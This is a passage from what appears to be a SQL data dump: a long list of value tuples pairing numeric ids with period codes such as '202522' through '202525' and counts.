22',4),(2152,1,'202522',4),(2609,1,'202522',4),(2801,1,'202522',4),(2964,1,'202522',4),(2991,1,'202522',4),(3004,1,'202522',4),(3006,1,'202522',4),(3066,1,'202522',4),(3090,1,'202522',4),(3104,1,'202522',4),(3107,1,'202522',4),(3109,1,'202522',4),(3124,1,'202522',4),(3229,1,'202522',4),(3243,1,'202522',4),(3245,1,'202522',4),(3251,1,'202522',4),(3265,1,'202522',4),(3267,1,'202522',4),(3275,1,'202522',4),(3282,1,'202522',4),(3438,1,'202522',4),(3735,1,'202522',4),(3771,1,'202522',4),(4335,1,'202522',4),(4396,1,'202522',4),(4432,1,'202522',4),(4524,1,'202522',4),(4542,1,'202522',4),(4648,1,'202522',4),(4651,1,'202522',4),(4691,1,'202522',4),(4694,1,'202522',4),(4759,1,'202522',4),(4762,1,'202522',4),(4776,1,'202522',4),(4996,1,'202522',4),(5101,1,'202522',4),(5131,1,'202522',4),(5140,1,'202522',4),(5157,1,'202522',4),(5163,1,'202522',4),(5259,1,'202522',4),(5268,1,'202522',4),(5374,1,'202522',4),(570,1,'202522',5),(1588,1,'202522',5),(1614,1,'202522',5),(1705,1,'202522',5),(1707,1,'202522',5),(1715,1,'202522',5),(1726,1,'202522',5),(1730,1,'202522',5),(1732,1,'202522',5),(1741,1,'202522',5),(1751,1,'202522',5),(1766,1,'202522',5),(1778,1,'202522',5),(2159,1,'202522',5),(2178,1,'202522',5),(2293,1,'202522',5),(2956,1,'202522',5),(2993,1,'202522',5),(3005,1,'202522',5),(3023,1,'202522',5),(3063,1,'202522',5),(3087,1,'202522',5),(3226,1,'202522',5),(3271,1,'202522',5),(3290,1,'202522',5),(3307,1,'202522',5),(3742,1,'202522',5),(3764,1,'202522',5),(4238,1,'202522',5),(4332,1,'202522',5),(4400,1,'202522',5),(4448,1,'202522',5),(4514,1,'202522',5),(4685,1,'202522',5),(4888,1,'202522',5),(4893,1,'202522',5),(4980,1,'202522',5),(5033,1,'202522',5),(5071,1,'202522',5),(5134,1,'202522',5),(5137,1,'202522',5),(5280,1,'202522',5),(5292,1,'202522',5),(5320,1,'202522',5),(469,1,'202522',6),(476,1,'202522',6),(488,1,'202522',6),(2297,1,'202522',6),(2457,1,'202522',6),(2911,1,'202522',6),(2989,1,'202522',6),(3102,1,'202522',6),(3257,1,'202522',6),(3273,1,'202522',6),(3534,1,'202522',6),(4444,1,'202522',6),(4645,1,'202522',6),(4697,1,'202522',6),(4750,1,'202522',6),(5042,1,'202522',6),(5050,1,'202522',6),(5076,1,'202522',6),(5146,1,'202522',6),(5153,1,'202522',6),(5295,1,'202522',6),(5301,1,'202522',6),(5323,1,'202522',6),(5356,1,'202522',6),(5359,1,'202522',6),(5412,1,'202522',6),(486,1,'202522',7),(1584,1,'202522',7),(1594,1,'202522',7),(1608,1,'202522',7),(2296,1,'202522',7),(2558,1,'202522',7),(2769,1,'202522',7),(3041,1,'202522',7),(3280,1,'202522',7),(4420,1,'202522',7),(5080,1,'202522',7),(5314,1,'202522',7),(1768,1,'202522',8),(2704,1,'202522',8),(2775,1,'202522',8),(2809,1,'202522',8),(3489,1,'202522',8),(4416,1,'202522',8),(1586,1,'202522',9),(2658,1,'202522',9),(2813,1,'202522',9),(1592,1,'202522',10),(4301,1,'202522',10),(5397,1,'202522',10),(5400,1,'202522',11),(470,1,'202522',12),(1582,1,'202522',12),(5420,1,'202522',12),(74,1,'202522',13),(473,1,'202522',13),(487,1,'202522',13),(468,1,'202522',14),(474,1,'202522',14),(4930,1,'202522',16),(5433,1,'202522',17),(84,1,'202522',18),(108,1,'202522',18),(5415,1,'202522',18),(87,1,'202522',19),(5409,1,'202522',22),(335,1,'202522',29),(2904,1,'202522',29),(91,1,'202522',30),(76,1,'202522',31),(3781,1,'202522',31),(72,1,'202522',33),(2503,1,'202522',33),(3060,1,'202522',34),(5406,1,'202522',34),(89,1,'202522',35),(5436,1,'202522',41),(5425,1,'202522',50),(68,1,'202522',69),(80,1,'202522',89),(5428,1,'202522',97),(9,1,'202522',2237),(2296,1,'202523',2),(106,1,'202523',3),(4416,1,'202523',3),(4436,1,'202523',3),(4797,1,'202523',3),(110,1,'202523',4),(570,1,'202523',4),(1705,1,'202523',4),(1720,1,'202523',4),(1743,1,'202523',4),(1751,1,'202523',4),(2161,1,'202523',4),(2293,1,'202523',4),(2617,1,'202523',4),(3072,1,'202523',4),(3092,1,'202523',4),(3107,1,'202523',4),(3261,1,'202523',4),(3269,1,'202523',4),(3273,1,'202523',4),(3721,1,'202523',4),(3727,1,'202523',4),(4332,1,'202523',4),(4335,1,'202523',4),(4357,1,'202523',4),(4363,1,'202523',4),(4396,1,'202523',4),(4412,1,'202523',4),(4428,1,'202523',4),(4706,1,'202523',4),(4759,1,'202523',4),(4762,1,'202523',4),(4878,1,'202523',4),(4988,1,'202523',4),(5042,1,'202523',4),(5050,1,'202523',4),(5062,1,'202523',4),(5067,1,'202523',4),(5080,1,'202523',4),(5137,1,'202523',4),(5295,1,'202523',4),(5301,1,'202523',4),(5320,1,'202523',4),(5323,1,'202523',4),(5326,1,'202523',4),(477,1,'202523',5),(1596,1,'202523',5),(1602,1,'202523',5),(1697,1,'202523',5),(1718,1,'202523',5),(1728,1,'202523',5),(1734,1,'202523',5),(1737,1,'202523',5),(1739,1,'202523',5),(1768,1,'202523',5),(1778,1,'202523',5),(2150,1,'202523',5),(2152,1,'202523',5),(2457,1,'202523',5),(2558,1,'202523',5),(2748,1,'202523',5),(2804,1,'202523',5),(2989,1,'202523',5),(2993,1,'202523',5),(3226,1,'202523',5),(3247,1,'202523',5),(3249,1,'202523',5),(3267,1,'202523',5),(3275,1,'202523',5),(3278,1,'202523',5),(3724,1,'202523',5),(4238,1,'202523',5),(4326,1,'202523',5),(4338,1,'202523',5),(4341,1,'202523',5),(4368,1,'202523',5),(4373,1,'202523',5),(4382,1,'202523',5),(4408,1,'202523',5),(4440,1,'202523',5),(4444,1,'202523',5),(4517,1,'202523',5),(4529,1,'202523',5),(4582,1,'202523',5),(4612,1,'202523',5),(4668,1,'202523',5),(4677,1,'202523',5),(4685,1,'202523',5),(4691,1,'202523',5),(4694,1,'202523',5),(4744,1,'202523',5),(4753,1,'202523',5),(4792,1,'202523',5),(4802,1,'202523',5),(4893,1,'202523',5),(4983,1,'202523',5),(5028,1,'202523',5),(5033,1,'202523',5),(5122,1,'202523',5),(5125,1,'202523',5),(5134,1,'202523',5),(5153,1,'202523',5),(5256,1,'202523',5),(5259,1,'202523',5),(5271,1,'202523',5),(5280,1,'202523',5),(5292,1,'202523',5),(5304,1,'202523',5),(5317,1,'202523',5),(5330,1,'202523',5),(5359,1,'202523',5),(5374,1,'202523',5),(5378,1,'202523',5),(5383,1,'202523',5),(478,1,'202523',6),(483,1,'202523',6),(488,1,'202523',6),(1590,1,'202523',6),(1594,1,'202523',6),(1614,1,'202523',6),(1699,1,'202523',6),(1707,1,'202523',6),(1726,1,'202523',6),(1730,1,'202523',6),(1732,1,'202523',6),(1741,1,'202523',6),(1772,1,'202523',6),(2063,1,'202523',6),(2148,1,'202523',6),(2154,1,'202523',6),(2156,1,'202523',6),(2165,1,'202523',6),(2178,1,'202523',6),(3066,1,'202523',6),(3087,1,'202523',6),(3124,1,'202523',6),(3240,1,'202523',6),(3259,1,'202523',6),(3265,1,'202523',6),(3287,1,'202523',6),(3430,1,'202523',6),(3438,1,'202523',6),(3486,1,'202523',6),(3498,1,'202523',6),(3531,1,'202523',6),(3714,1,'202523',6),(3731,1,'202523',6),(3738,1,'202523',6),(3742,1,'202523',6),(3746,1,'202523',6),(3771,1,'202523',6),(3774,1,'202523',6),(3777,1,'202523',6),(4329,1,'202523',6),(4377,1,'202523',6),(4387,1,'202523',6),(4404,1,'202523',6),(4424,1,'202523',6),(4432,1,'202523',6),(4454,1,'202523',6),(4514,1,'202523',6),(4524,1,'202523',6),(4542,1,'202523',6),(4551,1,'202523',6),(4566,1,'202523',6),(4587,1,'202523',6),(4591,1,'202523',6),(4608,1,'202523',6),(4645,1,'202523',6),(4654,1,'202523',6),(4657,1,'202523',6),(4663,1,'202523',6),(4681,1,'202523',6),(4688,1,'202523',6),(4703,1,'202523',6),(4709,1,'202523',6),(4712,1,'202523',6),(4722,1,'202523',6),(4741,1,'202523',6),(4750,1,'202523',6),(4765,1,'202523',6),(4870,1,'202523',6),(4883,1,'202523',6),(4888,1,'202523',6),(4976,1,'202523',6),(4977,1,'202523',6),(4996,1,'202523',6),(5020,1,'202523',6),(5024,1,'202523',6),(5046,1,'202523',6),(5058,1,'202523',6),(5071,1,'202523',6),(5131,1,'202523',6),(5163,1,'202523',6),(5248,1,'202523',6),(5276,1,'202523',6),(5298,1,'202523',6),(5307,1,'202523',6),(5314,1,'202523',6),(5334,1,'202523',6),(471,1,'202523',7),(472,1,'202523',7),(481,1,'202523',7),(482,1,'202523',7),(485,1,'202523',7),(486,1,'202523',7),(1544,1,'202523',7),(1588,1,'202523',7),(1592,1,'202523',7),(1604,1,'202523',7),(1695,1,'202523',7),(1703,1,'202523',7),(1709,1,'202523',7),(1713,1,'202523',7),(1715,1,'202523',7),(1722,1,'202523',7),(1747,1,'202523',7),(1774,1,'202523',7),(1776,1,'202523',7),(2252,1,'202523',7),(2297,1,'202523',7),(2751,1,'202523',7),(2801,1,'202523',7),(2809,1,'202523',7),(2964,1,'202523',7),(2991,1,'202523',7),(3005,1,'202523',7),(3006,1,'202523',7),(3027,1,'202523',7),(3034,1,'202523',7),(3045,1,'202523',7),(3063,1,'202523',7),(3079,1,'202523',7),(3096,1,'202523',7),(3102,1,'202523',7),(3104,1,'202523',7),(3109,1,'202523',7),(3229,1,'202523',7),(3243,1,'202523',7),(3245,1,'202523',7),(3251,1,'202523',7),(3253,1,'202523',7),(3257,1,'202523',7),(3280,1,'202523',7),(3297,1,'202523',7),(3307,1,'202523',7),(3479,1,'202523',7),(3541,1,'202523',7),(3710,1,'202523',7),(3735,1,'202523',7),(3749,1,'202523',7),(3764,1,'202523',7),(4323,1,'202523',7),(4391,1,'202523',7),(4400,1,'202523',7),(4520,1,'202523',7),(4546,1,'202523',7),(4648,1,'202523',7),(4651,1,'202523',7),(4660,1,'202523',7),(4697,1,'202523',7),(4700,1,'202523',7),(4747,1,'202523',7),(4756,1,'202523',7),(4768,1,'202523',7),(4776,1,'202523',7),(4858,1,'202523',7),(4862,1,'202523',7),(4866,1,'202523',7),(4897,1,'202523',7),(5037,1,'202523',7),(5054,1,'202523',7),(5128,1,'202523',7),(5140,1,'202523',7),(5146,1,'202523',7),(5157,1,'202523',7),(5253,1,'202523',7),(5264,1,'202523',7),(5289,1,'202523',7),(5353,1,'202523',7),(5356,1,'202523',7),(5363,1,'202523',7),(476,1,'202523',8),(479,1,'202523',8),(480,1,'202523',8),(487,1,'202523',8),(1584,1,'202523',8),(1600,1,'202523',8),(1608,1,'202523',8),(1711,1,'202523',8),(1724,1,'202523',8),(1745,1,'202523',8),(1749,1,'202523',8),(1766,1,'202523',8),(1770,1,'202523',8),(2159,1,'202523',8),(2248,1,'202523',8),(2609,1,'202523',8),(2658,1,'202523',8),(3004,1,'202523',8),(3038,1,'202523',8),(3041,1,'202523',8),(3069,1,'202523',8),(3083,1,'202523',8),(3090,1,'202523',8),(3117,1,'202523',8),(3127,1,'202523',8),(3263,1,'202523',8),(3271,1,'202523',8),(3285,1,'202523',8),(3482,1,'202523',8),(3489,1,'202523',8),(3534,1,'202523',8),(3752,1,'202523',8),(4275,1,'202523',8),(4448,1,'202523',8),(4556,1,'202523',8),(4674,1,'202523',8),(4771,1,'202523',8),(4980,1,'202523',8),(5101,1,'202523',8),(5268,1,'202523',8),(5310,1,'202523',8),(5409,1,'202523',8),(102,1,'202523',9),(467,1,'202523',9),(469,1,'202523',9),(484,1,'202523',9),(1582,1,'202523',9),(1586,1,'202523',9),(1606,1,'202523',9),(1701,1,'202523',9),(1780,1,'202523',9),(2309,1,'202523',9),(2769,1,'202523',9),(2956,1,'202523',9),(3282,1,'202523',9),(3313,1,'202523',9),(3316,1,'202523',9),(4301,1,'202523',9),(4457,1,'202523',9),(4874,1,'202523',9),(5076,1,'202523',9),(74,1,'202523',10),(1598,1,'202523',10),(1610,1,'202523',10),(1782,1,'202523',10),(2911,1,'202523',10),(2965,1,'202523',10),(3290,1,'202523',10),(468,1,'202523',11),(474,1,'202523',11),(1612,1,'202523',11),(2813,1,'202523',11),(3030,1,'202523',11),(87,1,'202523',12),(2775,1,'202523',12),(3023,1,'202523',12),(3097,1,'202523',12),(5420,1,'202523',12),(5433,1,'202523',12),(473,1,'202523',13),(5400,1,'202523',13),(108,1,'202523',14),(470,1,'202523',14),(4420,1,'202523',14),(4930,1,'202523',15),(5412,1,'202523',15),(5406,1,'202523',17),(84,1,'202523',18),(2704,1,'202523',19),(5397,1,'202523',19),(5415,1,'202523',20),(3060,1,'202523',21),(2904,1,'202523',24),(5436,1,'202523',24),(335,1,'202523',25),(3781,1,'202523',25),(5428,1,'202523',25),(91,1,'202523',27),(2503,1,'202523',28),(5425,1,'202523',29),(76,1,'202523',34),(89,1,'202523',37),(72,1,'202523',53),(5441,1,'202523',60),(68,1,'202523',70),(80,1,'202523',73),(9,1,'202523',2064),(4412,1,'202524',2),(1697,1,'202524',3),(1715,1,'202524',3),(3249,1,'202524',3),(1699,1,'202524',4),(1730,1,'202524',4),(1766,1,'202524',4),(1772,1,'202524',4),(2296,1,'202524',4),(3247,1,'202524',4),(3282,1,'202524',4),(4416,1,'202524',4),(4858,1,'202524',4),(4883,1,'202524',4),(4888,1,'202524',4),(5020,1,'202524',4),(106,1,'202524',5),(1586,1,'202524',5),(1701,1,'202524',5),(1720,1,'202524',5),(1739,1,'202524',5),(1741,1,'202524',5),(1747,1,'202524',5),(1770,1,'202524',5),(2152,1,'202524',5),(2154,1,'202524',5),(2248,1,'202524',5),(2252,1,'202524',5),(2609,1,'202524',5),(2751,1,'202524',5),(3251,1,'202524',5),(3269,1,'202524',5),(3278,1,'202524',5),(3280,1,'202524',5),(4238,1,'202524',5),(4368,1,'202524',5),(4382,1,'202524',5),(4404,1,'202524',5),(4436,1,'202524',5),(4444,1,'202524',5),(4454,1,'202524',5),(4542,1,'202524',5),(4587,1,'202524',5),(4591,1,'202524',5),(4759,1,'202524',5),(4792,1,'202524',5),(4797,1,'202524',5),(4866,1,'202524',5),(4897,1,'202524',5),(5028,1,'202524',5),(1590,1,'202524',6),(1695,1,'202524',6),(1711,1,'202524',6),(1713,1,'202524',6),(1722,1,'202524',6),(1726,1,'202524',6),(1774,1,'202524',6),(1776,1,'202524',6),(2063,1,'202524',6),(2150,1,'202524',6),(2156,1,'202524',6),(2161,1,'202524',6),(2165,1,'202524',6),(2178,1,'202524',6),(2297,1,'202524',6),(2617,1,'202524',6),(3102,1,'202524',6),(3240,1,'202524',6),(3245,1,'202524',6),(3257,1,'202524',6),(3267,1,'202524',6),(4301,1,'202524',6),(4341,1,'202524',6),(4408,1,'202524',6),(4428,1,'202524',6),(4440,1,'202524',6),(4520,1,'202524',6),(4546,1,'202524',6),(4608,1,'202524',6),(4645,1,'202524',6),(4681,1,'202524',6),(4688,1,'202524',6),(4700,1,'202524',6),(4709,1,'202524',6),(4802,1,'202524',6),(4862,1,'202524',6),(5033,1,'202524',6),(5037,1,'202524',6),(5163,1,'202524',6),(110,1,'202524',7),(1594,1,'202524',7),(1602,1,'202524',7),(1614,1,'202524',7),(1703,1,'202524',7),(1707,1,'202524',7),(1718,1,'202524',7),(1724,1,'202524',7),(1734,1,'202524',7),(1745,1,'202524',7),(1778,1,'202524',7),(2148,1,'202524',7),(2159,1,'202524',7),(2658,1,'202524',7),(3005,1,'202524',7),(3030,1,'202524',7),(3045,1,'202524',7),(3079,1,'202524',7),(3087,1,'202524',7),(3109,1,'202524',7),(3229,1,'202524',7),(3259,1,'202524',7),(3263,1,'202524',7),(3273,1,'202524',7),(3287,1,'202524',7),(3307,1,'202524',7),(3313,1,'202524',7),(3430,1,'202524',7),(3438,1,'202524',7),(3531,1,'202524',7),(3541,1,'202524',7),(3731,1,'202524',7),(3738,1,'202524',7),(3746,1,'202524',7),(4323,1,'202524',7),(4326,1,'202524',7),(4332,1,'202524',7),(4357,1,'202524',7),(4363,1,'202524',7),(4373,1,'202524',7),(4387,1,'202524',7),(4432,1,'202524',7),(4448,1,'202524',7),(4457,1,'202524',7),(4514,1,'202524',7),(4517,1,'202524',7),(4551,1,'202524',7),(4566,1,'202524',7),(4612,1,'202524',7),(4648,1,'202524',7),(4651,1,'202524',7),(4657,1,'202524',7),(4668,1,'202524',7),(4677,1,'202524',7),(4685,1,'202524',7),(4691,1,'202524',7),(4744,1,'202524',7),(4870,1,'202524',7),(4874,1,'202524',7),(5050,1,'202524',7),(5058,1,'202524',7),(5062,1,'202524',7),(5253,1,'202524',7),(5264,1,'202524',7),(5289,1,'202524',7),(5295,1,'202524',7),(5374,1,'202524',7),(102,1,'202524',8),(483,1,'202524',8),(1544,1,'202524',8),(1705,1,'202524',8),(1709,1,'202524',8),(1732,1,'202524',8),(1737,1,'202524',8),(1749,1,'202524',8),(1782,1,'202524',8),(2293,1,'202524',8),(2558,1,'202524',8),(2748,1,'202524',8),(2769,1,'202524',8),(2964,1,'202524',8),(2965,1,'202524',8),(3004,1,'202524',8),(3006,1,'202524',8),(3034,1,'202524',8),(3038,1,'202524',8),(3069,1,'202524',8),(3097,1,'202524',8),(3104,1,'202524',8),(3124,1,'202524',8),(3127,1,'202524',8),(3253,1,'202524',8),(3261,1,'202524',8),(3265,1,'202524',8),(3275,1,'202524',8),(3290,1,'202524',8),(3316,1,'202524',8),(3479,1,'202524',8),(3534,1,'202524',8),(3735,1,'202524',8),(3749,1,'202524',8),(4329,1,'202524',8),(4335,1,'202524',8),(4338,1,'202524',8),(4396,1,'202524',8),(4424,1,'202524',8),(4556,1,'202524',8),(4654,1,'202524',8),(4663,1,'202524',8),(4706,1,'202524',8),(4722,1,'202524',8),(4771,1,'202524',8),(4878,1,'202524',8),(4976,1,'202524',8),(5024,1,'202524',8),(5042,1,'202524',8),(5101,1,'202524',8),(5248,1,'202524',8),(5378,1,'202524',8),(5383,1,'202524',8),(472,1,'202524',9),(482,1,'202524',9),(1584,1,'202524',9),(1612,1,'202524',9),(1728,1,'202524',9),(1743,1,'202524',9),(1751,1,'202524',9),(1780,1,'202524',9),(2911,1,'202524',9),(2989,1,'202524',9),(2993,1,'202524',9),(3066,1,'202524',9),(3072,1,'202524',9),(3092,1,'202524',9),(3096,1,'202524',9),(3107,1,'202524',9),(3226,1,'202524',9),(3243,1,'202524',9),(3271,1,'202524',9),(3285,1,'202524',9),(3710,1,'202524',9),(3727,1,'202524',9),(4275,1,'202524',9),(4391,1,'202524',9),(4400,1,'202524',9),(4582,1,'202524',9),(4674,1,'202524',9),(4694,1,'202524',9),(4697,1,'202524',9),(4703,1,'202524',9),(4741,1,'202524',9),(4747,1,'202524',9),(4753,1,'202524',9),(4756,1,'202524',9),(4765,1,'202524',9),(4768,1,'202524',9),(4893,1,'202524',9),(4988,1,'202524',9),(5046,1,'202524',9),(5054,1,'202524',9),(5067,1,'202524',9),(5080,1,'202524',9),(5122,1,'202524',9),(5128,1,'202524',9),(5140,1,'202524',9),(5146,1,'202524',9),(5153,1,'202524',9),(5157,1,'202524',9),(5259,1,'202524',9),(5276,1,'202524',9),(5298,1,'202524',9),(478,1,'202524',10),(484,1,'202524',10),(485,1,'202524',10),(1596,1,'202524',10),(1600,1,'202524',10),(1608,1,'202524',10),(1610,1,'202524',10),(2457,1,'202524',10),(2801,1,'202524',10),(2956,1,'202524',10),(2991,1,'202524',10),(3090,1,'202524',10),(3117,1,'202524',10),(3482,1,'202524',10),(3721,1,'202524',10),(3724,1,'202524',10),(3764,1,'202524',10),(3777,1,'202524',10),(4377,1,'202524',10),(4712,1,'202524',10),(4977,1,'202524',10),(5076,1,'202524',10),(5125,1,'202524',10),(5280,1,'202524',10),(5330,1,'202524',10),(469,1,'202524',11),(471,1,'202524',11),(480,1,'202524',11),(481,1,'202524',11),(488,1,'202524',11),(1582,1,'202524',11),(1598,1,'202524',11),(1606,1,'202524',11),(3041,1,'202524',11),(3063,1,'202524',11),(3714,1,'202524',11),(3742,1,'202524',11),(3752,1,'202524',11),(3771,1,'202524',11),(3774,1,'202524',11),(4996,1,'202524',11),(5131,1,'202524',11),(5134,1,'202524',11),(5320,1,'202524',11),(5323,1,'202524',11),(5326,1,'202524',11),(467,1,'202524',12),(476,1,'202524',12),(479,1,'202524',12),(570,1,'202524',12),(1768,1,'202524',12),(3486,1,'202524',12),(4524,1,'202524',12),(4750,1,'202524',12),(4762,1,'202524',12),(4980,1,'202524',12),(5071,1,'202524',12),(5268,1,'202524',12),(5271,1,'202524',12),(5292,1,'202524',12),(5359,1,'202524',12),(477,1,'202524',13),(487,1,'202524',13),(1604,1,'202524',13),(2309,1,'202524',13),(2804,1,'202524',13),(3023,1,'202524',13),(3083,1,'202524',13),(3297,1,'202524',13),(3489,1,'202524',13),(4529,1,'202524',13),(4776,1,'202524',13),(5137,1,'202524',13),(5301,1,'202524',13),(5310,1,'202524',13),(5314,1,'202524',13),(486,1,'202524',14),(2809,1,'202524',14),(5256,1,'202524',14),(5356,1,'202524',14),(5363,1,'202524',14),(2775,1,'202524',15),(4660,1,'202524',15),(4983,1,'202524',15),(5304,1,'202524',15),(5334,1,'202524',15),(5353,1,'202524',15),(5409,1,'202524',15),(470,1,'202524',16),(1592,1,'202524',16),(3498,1,'202524',16),(5307,1,'202524',16),(5317,1,'202524',16),(74,1,'202524',17),(2704,1,'202524',17),(2813,1,'202524',17),(3027,1,'202524',17),(3060,1,'202524',17),(84,1,'202524',18),(468,1,'202524',19),(473,1,'202524',19),(4930,1,'202524',19),(5397,1,'202524',19),(87,1,'202524',20),(1588,1,'202524',20),(4420,1,'202524',20),(5400,1,'202524',21),(474,1,'202524',22),(5420,1,'202524',22),(108,1,'202524',24),(5415,1,'202524',25),(5412,1,'202524',26),(5433,1,'202524',26),(5425,1,'202524',27),(91,1,'202524',28),(2904,1,'202524',31),(3781,1,'202524',32),(5436,1,'202524',32),(5406,1,'202524',33),(335,1,'202524',35),(2503,1,'202524',40),(76,1,'202524',43),(5428,1,'202524',44),(89,1,'202524',48),(72,1,'202524',49),(68,1,'202524',58),(5441,1,'202524',77),(80,1,'202524',100),(9,1,'202524',2241),(106,1,'202525',1),(3727,1,'202525',1),(483,1,'202525',2),(2293,1,'202525',2),(2296,1,'202525',2),(2993,1,'202525',2),(3259,1,'202525',2),(3261,1,'202525',2),(3273,1,'202525',2),(3735,1,'202525',2),(4363,1,'202525',2),(4517,1,'202525',2),(4668,1,'202525',2),(4759,1,'202525',2),(5122,1,'202525',2),(5163,1,'202525',2),(110,1,'202525',3),(480,1,'202525',3),(1695,1,'202525',3),(2159,1,'202525',3),(3092,1,'202525',3),(3097,1,'202525',3),(3102,1,'202525',3),(3107,1,'202525',3),(3127,1,'202525',3),(3247,1,'202525',3),(3257,1,'202525',3),(3269,1,'202525',3),(3285,1,'202525',3),(3316,1,'202525',3),(3731,1,'202525',3),(3738,1,'202525',3),(3749,1,'202525',3),(4238,1,'202525',3),(4332,1,'202525',3),(4368,1,'202525',3),(4412,1,'202525',3),(4654,1,'202525',3),(4688,1,'202525',3),(4709,1,'202525',3),(4858,1,'202525',3),(4870,1,'202525',3),(4883,1,'202525',3),(4893,1,'202525',3),(5304,1,'202525',3),(478,1,'202525',4),(481,1,'202525',4),(482,1,'202525',4),(485,1,'202525',4),(1610,1,'202525',4),(1713,1,'202525',4),(1724,1,'202525',4),(2148,1,'202525',4),(2156,1,'202525',4),(2457,1,'202525',4),(3038,1,'202525',4),(3079,1,'202525',4),(3087,1,'202525',4),(3263,1,'202525',4),(3267,1,'202525',4),(3280,1,'202525',4),(3307,1,'202525',4),(3746,1,'202525',4),(4323,1,'202525',4),(4326,1,'202525',4),(4338,1,'202525',4),(4357,1,'202525',4),(4382,1,'202525',4),(4404,1,'202525',4),(4408,1,'202525',4),(4428,1,'202525',4),(4436,1,'202525',4),(4514,1,'202525',4),(4612,1,'202525',4),(4651,1,'202525',4),(4685,1,'202525',4),(4744,1,'202525',4),(4797,1,'202525',4),(4802,1,'202525',4),(4897,1,'202525',4),(5033,1,'202525',4),(5037,1,'202525',4),(5062,1,'202525',4),(476,1,'202525',5),(484,1,'202525',5),(1606,1,'202525',5),(1711,1,'202525',5),(1730,1,'202525',5),(1737,1,'202525',5),(1739,1,'202525',5),(1741,1,'202525',5),(1743,1,'202525',5),(1747,1,'202525',5),(2152,1,'202525',5),(2748,1,'202525',5),(3096,1,'202525',5),(3249,1,'202525',5),(3251,1,'202525',5),(3253,1,'202525',5),(3265,1,'202525',5),(3278,1,'202525',5),(3531,1,'202525',5),(4329,1,'202525',5),(4391,1,'202525',5),(4396,1,'202525',5),(4400,1,'202525',5),(4457,1,'202525',5),(4587,1,'202525',5),(4608,1,'202525',5),(4660,1,'202525',5),(4703,1,'202525',5),(4712,1,'202525',5),(4722,1,'202525',5),(4874,1,'202525',5),(4878,1,'202525',5),(5024,1,'202525',5),(5028,1,'202525',5),(5125,1,'202525',5),(102,1,'202525',6),(1584,1,'202525',6),(1604,1,'202525',6),(1612,1,'202525',6),(1701,1,'202525',6),(1705,1,'202525',6),(1709,1,'202525',6),(1715,1,'202525',6),(1718,1,'202525',6),(1728,1,'202525',6),(1734,1,'202525',6),(1745,1,'202525',6),(1749,1,'202525',6),(1766,1,'202525',6),(1772,1,'202525',6),(2063,1,'202525',6),(2161,1,'202525',6),(2165,1,'202525',6),(2248,1,'202525',6),(2309,1,'202525',6),(2769,1,'202525',6),(3004,1,'202525',6),(3034,1,'202525',6),(3240,1,'202525',6),(3243,1,'202525',6),(3486,1,'202525',6),(3534,1,'202525',6),(3777,1,'202525',6),(4275,1,'202525',6),(4387,1,'202525',6),(4432,1,'202525',6),(4440,1,'202525',6),(4444,1,'202525',6),(4448,1,'202525',6),(4454,1,'202525',6),(4551,1,'202525',6),(4681,1,'202525',6),(4691,1,'202525',6),(4694,1,'202525',6),(4700,1,'202525',6),(4747,1,'202525',6),(4771,1,'202525',6),(4862,1,'202525',6),(4983,1,'202525',6),(5020,1,'202525',6),(5253,1,'202525',6),(469,1,'202525',7),(477,1,'202525',7),(488,1,'202525',7),(1726,1,'202525',7),(1732,1,'202525',7),(1751,1,'202525',7),(1768,1,'202525',7),(1774,1,'202525',7),(1776,1,'202525',7),(2154,1,'202525',7),(2252,1,'202525',7),(2297,1,'202525',7),(2964,1,'202525',7),(2989,1,'202525',7),(3041,1,'202525',7),(3063,1,'202525',7),(3245,1,'202525',7),(3275,1,'202525',7),(3287,1,'202525',7),(3430,1,'202525',7),(3482,1,'202525',7),(3721,1,'202525',7),(3764,1,'202525',7),(4335,1,'202525',7),(4341,1,'202525',7),(4416,1,'202525',7),(4556,1,'202525',7),(4645,1,'202525',7),(4657,1,'202525',7),(4674,1,'202525',7),(4741,1,'202525',7),(4750,1,'202525',7),(4866,1,'202525',7),(4996,1,'202525',7),(5054,1,'202525',7),(5058,1,'202525',7),(5101,1,'202525',7),(5128,1,'202525',7),(5137,1,'202525',7),(5153,1,'202525',7),(5280,1,'202525',7),(5292,1,'202525',7),(5301,1,'202525',7),(5310,1,'202525',7),(5334,1,'202525',7),(479,1,'202525',8),(486,1,'202525',8),(570,1,'202525',8),(1598,1,'202525',8),(1600,1,'202525',8),(1608,1,'202525',8),(1697,1,'202525',8),(1707,1,'202525',8),(1722,1,'202525',8),(1782,1,'202525',8),(2558,1,'202525',8),(2617,1,'202525',8),(2658,1,'202525',8),(3006,1,'202525',8),(3045,1,'202525',8),(3072,1,'202525',8),(3083,1,'202525',8),(3104,1,'202525',8),(3109,1,'202525',8),(3229,1,'202525',8),(3271,1,'202525',8),(3282,1,'202525',8),(3438,1,'202525',8),(3479,1,'202525',8),(3710,1,'202525',8),(3752,1,'202525',8),(3774,1,'202525',8),(4301,1,'202525',8),(4377,1,'202525',8),(4529,1,'202525',8),(4542,1,'202525',8),(4546,1,'202525',8),(4591,1,'202525',8),(4677,1,'202525',8),(4776,1,'202525',8),(4976,1,'202525',8),(5042,1,'202525',8),(5050,1,'202525',8),(5264,1,'202525',8),(5268,1,'202525',8),(5271,1,'202525',8),(5289,1,'202525',8),(5298,1,'202525',8),(5307,1,'202525',8),(5314,1,'202525',8),(5323,1,'202525',8),(5374,1,'202525',8),(5378,1,'202525',8),(5383,1,'202525',8),(471,1,'202525',9),(1590,1,'202525',9),(1592,1,'202525',9),(1594,1,'202525',9),(1699,1,'202525',9),(1703,1,'202525',9),(1778,1,'202525',9),(1780,1,'202525',9),(2150,1,'202525',9),(2178,1,'202525',9),(2911,1,'202525',9),(2991,1,'202525',9),(3005,1,'202525',9),(3117,1,'202525',9),(3541,1,'202525',9),(3714,1,'202525',9),(3724,1,'202525',9),(4762,1,'202525',9),(4768,1,'202525',9),(4792,1,'202525',9),(4888,1,'202525',9),(5067,1,'202525',9),(5080,1,'202525',9),(5131,1,'202525',9),(5146,1,'202525',9),(5276,1,'202525',9),(5317,1,'202525',9),(1544,1,'202525',10),(1596,1,'202525',10),(1602,1,'202525',10),(1614,1,'202525',10),(1720,1,'202525',10),(1770,1,'202525',10),(2751,1,'202525',10),(2956,1,'202525',10),(3124,1,'202525',10),(3297,1,'202525',10),(3313,1,'202525',10),(3489,1,'202525',10),(4373,1,'202525',10),(4420,1,'202525',10),(4424,1,'202525',10),(4524,1,'202525',10),(4663,1,'202525',10),(4697,1,'202525',10),(4765,1,'202525',10),(4977,1,'202525',10),(5046,1,'202525',10),(5071,1,'202525',10),(5134,1,'202525',10),(5140,1,'202525',10),(5248,1,'202525',1